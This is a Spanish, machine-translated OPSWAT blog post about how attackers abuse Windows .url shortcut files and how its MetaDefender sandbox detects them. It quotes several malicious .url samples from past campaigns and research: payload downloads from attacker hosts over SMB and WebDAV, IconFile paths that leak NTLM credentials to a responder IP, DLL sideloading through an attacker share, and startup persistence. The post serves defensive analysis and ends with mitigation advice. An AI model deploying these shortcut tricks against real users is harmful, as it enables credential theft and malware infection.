Envío de registros, alertas y datos de telemetría a través de un diodo de datos

Descubre cómo
Utilizamos inteligencia artificial para traducir el sitio web y, aunque nos esforzamos por garantizar la precisión, es posible que las traducciones no sean siempre 100 % exactas. Agradecemos tu comprensión.

«Shortcut to Malice», parte 3: Análisis del comportamiento de archivos URL con MetaDefender

¿Qué ocurre después de hacer clic?: seguimiento de la ejecución, la persistencia y el robo de credenciales en tiempo real.
Por OPSWAT
Última actualización:
Comparte esta publicación

Introducción

Mientras que la inspección estática revela lo que contiene un archivo, el análisis dinámico nos indica lo que hace. En el caso de los archivos de acceso directo a Internet (.url), esta distinción es fundamental. Aunque en el disco parecen inofensivos, estos archivos suelen actuar como puntos de activación en campañas de malware de varias fases, ejecutando cargas útiles remotas, robando credenciales o facilitando la persistencia.

En esta tercera y última entrega de nuestra serie sobre las amenazas de los archivos .url, nos centramos en el comportamiento dinámico: cómo funcionan los archivos .url en la práctica y qué actividad revelan tras su ejecución. La mejor forma de analizar esta perspectiva basada en el comportamiento es a través de MetaDefender , el entorno de detonación de malware OPSWATque emula la interacción del usuario final y descubre rutas de ejecución que los análisis estáticos no pueden detectar.

Puedes consultar las dos entradas anteriores del blog seleccionando una de las siguientes opciones:

Comportamiento malicioso en acción

Ilustración de varios archivos URL, algunos resaltados en rojo, que representa el análisis del comportamiento de los archivos URL para detectar amenazas

Las vulnerabilidades que permiten eludir las medidas de seguridad no son la única forma de utilizar los archivos URL con fines maliciosos; de hecho, los autores de amenazas no dudan en emplear en sus ataques elementos que sí provocan la aparición de avisos de advertencia para los usuarios. Una advertencia sobre el riesgo del contenido es una medida de protección importante, pero, si se combina con un contenido de ingeniería social convincente, puede que no sea suficiente para convencer a una persona de que ese contenido es malicioso.

A principios de 2018, el SANS ISC describió un ataque de phishing en el que los autores del ataque utilizaron archivos URL junto con descargadores basados en JavaScript para distribuir malware, incluido el troyano Quant Loader. Las muestras de archivos URL tenían un aspecto similar al siguiente:

[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9 

 

[InternetShortcut] 

IDList= 

URL=file://buyviagraoverthecounterusabb[.]net/documents/I57677294166.js 

HotKey=0 

IconIndex=3 

IconFile=C:\Windows\System32\shell32.dll

Los investigadores señalaron que los archivos URL provocaban que los usuarios recibieran avisos de archivos no fiables. Esto podría haber ocurrido en sistemas en los que se habían aplicado parches para vulnerabilidades anteriores, como la CVE-2016-3353; es posible que los usuarios que no hubieran aplicado los parches hayan tenido una experiencia diferente.

En este caso, la ruta URL de destino está configurada para recuperar contenido de un recurso compartido SMB. El hecho de que los dispositivos internos de redes de confianza puedan conectarse a servicios SMB remotos y recuperar contenido de ellos supone un riesgo considerable en sí mismo, independientemente de que se muestre o no alguna advertencia sobre contenido no fiable.

Lo que revela MetaDefender

El análisis estático señala los formatos sospechosos, pero MetaDefender detecta comportamientos en tiempo de ejecución que indican una vulneración real, tales como:

  • Consultas DNS o conexiones HTTP salientes hacia la infraestructura del atacante
  • Uso de componentes de Windows (por ejemplo, mshta.exe, wscript.exe) para ejecutar cargas útiles
  • El archivo escribe en las carpetas de inicio automático o en el Registro de Windows
  • Intentos de autenticación SMB que revelan credenciales NTLM
  • Comunicaciones de reserva WebDAV a través de HTTP/80 tras intentos fallidos de SMB

    Robo de credenciales a través de recursos remotos

    En 2018 se produjo otra aportación al panorama general del uso indebido de archivos URL, esta vez en relación con la filtración de información y la posibilidad de que los archivos URL desempeñen un papel en la captura de datos de autenticación y credenciales por parte de atacantes remotos. 

    En mayo, Securify señalaron varias formas en las que se podía engañar a los subsistemas de Windows para que enviaran las credenciales NTLM de un usuario a un servidor controlado por el atacante. Revelaron dos métodos que utilizan archivos URL, como este sencillo método que simplemente utiliza el file:// prefijo para hacer referencia a un archivo remoto: 

    [InternetShortcut] 

    URL=file://<responder ip>/leak/leak.html
    

    …además de este ejemplo, en el que se utiliza la opción IconFile para activar el controlador de URL con el fin de recuperar un archivo de icono remoto del que extraer una imagen para su visualización:

    [InternetShortcut] 

    URL=https://securify.nl 

    IconIndex=0 

    IconFile=\\<responder ip>\leak\leak.ico
    

    En el caso del segundo, queda claro que hay muchos motivos de preocupación, entre ellos la opcionalidad del prefijo del protocolo, el uso intercambiable de barras inclinadas hacia delante o hacia atrás, y la persistencia generalizada de SMB como canal involuntario de elevación de privilegios a través de un acceso arriesgado a la infraestructura del atacante, lo que se traduce en lo que comúnmente se conoce como superficie de ataque en el sistema operativo.

    Este mismo enfoque, que consiste en utilizar la opción IconFile para acceder a las credenciales, también fue comentado posteriormente por Alex Inführ. Como se ha señalado, cuando se activan estos archivos URL, se inician conexiones SMB con los servidores remotos, lo que da lugar al intercambio de autenticación y a la revelación de los datos de credenciales NTLM al atacante. La herramienta más utilizada por numerosos actores maliciosos en el extremo remoto de este tipo de ataques es Responder.

    Más allá de lo obvio: carga lateral de DLL y persistencia

    Inführ reveló otro aspecto relacionado con el potencial de abuso de los archivos URL al analizar el uso indebido de los campos de dichos archivos para ejecutar código no fiable mediante la carga lateral de DLL. En esta prueba de concepto, se utiliza un archivo URL para apuntar a un archivo ejecutable local vulnerable al secuestro de la ruta de búsqueda de DLL; al activar el archivo URL, se procesa la opción WorkingDirectory, lo que hace que la ruta de búsqueda de la DLL cargada se configure para incluir un directorio controlado por el atacante en un recurso compartido SMB remoto.

    [Acceso directo de Internet] 

    URL=C:\windows\...\mscorsvw.exe 

    WorkingDirectory=\\attacker[.]com\SMBShare\
    

    Archivos URL para la persistencia del malware

    Tal y como se ha documentado en campañas de malware como el análisis de Zscaler ThreatLabz sobre el uso de DBatLoader para distribuir los RAT Remcos y Formbook, los archivos URL son archivos de acceso directo que también pueden utilizarse para la ejecución en un sistema.  

    Cuando se vinculan a ubicaciones de inicio automático, estos archivos también ofrecen un mecanismo de persistencia que permite que el malware se ejecute tras reiniciar el sistema o iniciar sesión. En el caso de esta campaña de distribución se utilizó el siguiente archivo URL, lo que permitió el inicio de la carga útil del malware en Xdfiifag.exe.

    [InternetShortcut] 

    URL=file:"C:\\Usuarios\\Público\\Bibliotecas\\Xdfiifag.exe" 

    IconIndex=13 

    HotKey=49
    

    Análisis de la campaña: NetSupport RAT a través de WebDAV

    En junio de 2023, @AnFam17 compartió información sobre un redireccionador de tráfico basado en ingeniería social que distribuía a los usuarios a cargas del RAT NetSupport, de nuevo principalmente a través de archivos URL. Las páginas de destino basadas en ingeniería social estaban vinculadas a un kit conocido como FakeSG. Ejemplo de archivo URL (Install Updater (msi-stable(V102.84.3348).url): 

    [InternetShortcut] 

    URL=file:\\94.158.247.6@80\Downloads\updatermsi.hta 

    ShowCommand=7 

    IconIndex=247 

    IconFile=C:\Windows\System32\shell32.dll
    

    Este archivo URL muestra, al igual que las versiones anteriores, que el file:// El prefijo del protocolo puede representarse con gran flexibilidad, en este caso utilizando barras invertidas en lugar de barras normales, lo que pone de relieve un aspecto que puede resultar complicado para los ingenieros de detección.

    Cabe señalar aquí que, al igual que en el caso de los archivos URL mencionados anteriormente que utilizan prefijos de archivo, se produce una inconsistencia inherente. En el caso de estas URL, el atacante aloja las cargas útiles en un servidor WebDAV, lo que hace que el contenido no se recupere mediante SMB, sino a través de HTTP utilizando el protocolo WebDAV en el puerto 80/tcp.

    Vulnerabilidades del mundo real y captura de comportamientos

    Otro caso destacado en el contexto de este tema se produjo en torno a la revelación de otra vulnerabilidad de gran repercusión, la CVE-2023-36884, que se hizo pública en julio de 2023. En aquel momento se trataba de una vulnerabilidad de día cero que, según se había informado, se había utilizado en campañas de ataques selectivos, llevadas a cabo por un grupo malicioso para distribuir una variante modificada del RAT RomCom.  

    Esta compleja cadena de amenazas en varias fases volvió a poner de relieve el tema del manejo de archivos URL y puso de manifiesto observaciones sobre la ejecución de código remoto no controlada cuando se carga una carga útil desde una ruta de archivo ZIP a la que se accede a través de WebDAV. 

    El papel de MetaDefender en todo esto

    Imagen MetaDefender que muestra el análisis de comportamiento de archivos URL mediante la supervisión de procesos, archivos, redes y el registro

    MetaDefender detecta todos los comportamientos mencionados anteriormente —y muchos más— mediante la observación de la actividad de los archivos en:

    • Ejecución del proceso
    • Cambios en el sistema de archivos
    • Conexiones de red
    • Modificaciones del Registro
    • Inyección de memoria y descompresión dinámica

    Gracias a la compatibilidad con archivos .url y cadenas de carga útil complejas, ofrece a los responsables de la seguridad una visión clara del flujo de ejecución y permite responder en tiempo real antes de que los usuarios se vean afectados.

    Consulta el archivo de ejemplo de la URL en cuestión en Filescan , aquí.

    Interfaz de usuario MetaDefender que muestra el análisis de comportamiento de archivos URL con amenazas confirmadas e indicadores detallados de amenazas
    Indicadores de amenazas identificados por MetaDefender 

    Reflexiones finales

    Con esta retrospectiva sobre el ámbito de los abusos relacionados con los accesos directos de Internet (archivos URL), podemos observar que, durante varios años, han desempeñado un papel en el panorama de las amenazas, aunque haya sido secundario y rara vez el protagonista principal. A menudo, las tecnologías habilitadoras y las formas de eludir las medidas de seguridad se clasifican como vulnerabilidades de baja gravedad y, en ocasiones, incluso se descartan como errores no relacionados con la seguridad, por lo que no alcanzan el nivel necesario para que los proveedores las incluyan en el registro CVE.

    Muchas veces, como analistas de amenazas, nos centramos en el culpable más obvio dentro de las secuencias de amenazas, prestando especial atención a las cargas útiles finales y a cómo los atacantes actúan para alcanzar su objetivo. Sin embargo, es importante señalar que los adversarios actuales se han dado cuenta de que el aumento de los costes derivado de la reducción de la superficie de ataque puede compensarse con técnicas cada vez más complejas basadas en archivos, y las secuencias de ataque que utilizan archivos URL suelen ser un buen indicador de su uso en dichas cadenas de ataque.

    OPSWAT a las organizaciones que mantengan la atención en este ámbito de técnicas de espionaje informático basadas en archivos, que son complejas y presentan múltiples niveles.

    • Supervise los intentos de acceso a archivos de URL alojados en servidores remotos. Las organizaciones pueden considerar conveniente bloquear el acceso a dichos archivos.
    • Analizar e inspeccionar los objetivos en los archivos URL detectados en el entorno, buscando aquellos que hagan un uso indebido de las características de los protocolos basados en «file://», aquellos que hagan referencia a rutas SMB o WebDAV externas, y otras anomalías en los campos URL, IconFile y WorkingDirectory
    • Supervise y valide las sesiones SMB y WebDAV salientes con infraestructuras externas no fiables. Tenga en cuenta que existen varios servicios y soluciones de almacenamiento en la nube compatibles con WebDAV que han sido objeto de uso indebido en campañas de amenazas, entre ellos 4shared, DriveHQ y OpenDrive. Estos servicios proporcionan a los atacantes plataformas de acceso público e imposibles de rastrear que pueden ser aprovechadas para atacar a posibles víctimas.
    • Bloquee las conexiones a servicios SMB externos. Años de actividad maliciosa relacionada han demostrado que esto constituye una fuente constante de problemas en lo que respecta a la filtración de información, la ejecución remota de código y otros riesgos asociados. Es probable que los futuros ataques sigan aprovechando este tipo de tácticas, especialmente contra versiones antiguas de sistemas operativos, y controles como estos pueden ayudar a detectar y neutralizar amenazas desconocidas en estos casos.
    • Aproveche nuestras tecnologías de vanguardia Deep File Inspection® y RetroHunt® para realizar análisis más exhaustivos y detectar más ataques transmitidos a través de archivos que cualquier otra solución.

    En este artículo se ha demostrado que los archivos URL van mucho más allá de los simples accesos directos: provocan fugas de credenciales, descargan cargas maliciosas de redes no fiables, secuestran la carga de DLL e incluso permiten la persistencia de malware en los dispositivos finales.

    La única forma de detectar estos comportamientos con certeza es observarlos, y ahí es donde MetaDefender ofrece información crucial. Gracias a la potencia de la inspección profunda de archivos y al contexto que proporciona MetaDefender , las organizaciones pueden adelantarse a las amenazas transmitidas a través de archivos en todas las fases de la cadena de ataque.

    Referencia

    ¡Mantente al día con OPSWAT!

    Regístrate hoy mismo para recibir las últimas novedades de la empresa, historias, información sobre eventos y mucho más.